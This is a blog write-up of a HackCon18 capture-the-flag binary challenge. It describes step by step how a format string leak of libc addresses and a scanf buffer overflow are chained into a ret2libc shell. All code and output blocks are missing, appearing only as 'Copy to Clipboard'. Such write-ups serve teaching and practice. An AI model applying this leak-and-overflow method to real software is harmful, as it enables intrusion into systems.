Simple yet elegent pwn12 min read

Hey guys, it’s just finished the HackCon18 ctf, let’s see the writeup of Simple Yet Elegent pwn. This pwn is based on format string vulnerability and buffer overflow, then our target is leak an address of libc with the format string (because we suppose that ASLR is enabled), and then calculate remote system for spawn a shell.

The first step is see what protection are enabled:

Copy to Clipboard

how we can see is all disabled except NX protection. Try now to execute the binary:

Copy to Clipboard

Ok, the process return our input, try now with a format string:

Copy to Clipboard

How we can see, there are addresses of process’s stack, again if we insert a big input:

Copy to Clipboard

there is a segmentation fault. Let’s jump in radare 2 for see the assembly code of this binary:

Copy to Clipboard

the main function get an input, with a scanf, and in this point there is an overflow. Examine now the core dump created with gdb:

Copy to Clipboard

In this way we calculated the size of buffer. Now we must examine the stack for search an address of libc to leak with format string. For this purpose we must run the program in gdb and break in printf function because with format string we get the memory stack of printf:

Copy to Clipboard

Good, there is an address of libc_start_main, but there is a problem, if we insert a big input for overflow the return address, our input overflow this address! Then we search another address of libc and then use it. In particular there is 0x00007ffff7a6287d that is at init of our format string, but only in remote! (For the moment I do not know why, but maybe is due to the different libc version). This address maybe is the fflush function but I’m not sure, then we calculate the difference from this value to libc_start_main to obtain the latter.

Run the remote process to obtain this two values:

Copy to Clipboard

where %1$p is the offset to obtain our mysterious address, and %17$p is the offset to obtain libc_start_main. The difference between this two address is:

Copy to Clipboard

Ok, now we have a valid address to libc! Now we get the init of libc_start_main and then search the system offset and bin sh. For this purpose we examine the libc that has been given to us:

Copy to Clipboard

where 0x21f45 corresponds to libc_start_main leaked, that is ad 245 byte from init of libc_start_main! Now we can calculate libc base and then system and bin sh! Run now libc database for get the offset of system and binsh:

Copy to Clipboard

Now, search for gadget to put bin sh address in rdi register:

Copy to Clipboard

Ok now we have all the ingredients for our script:

Copy to Clipboard

Now run it:

Copy to Clipboard

 

Recent Tweets

For privacy reasons Twitter needs your permission to be loaded.
I Accept
2018-08-17T21:49:18+00:00

About the Author:

Leave A Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.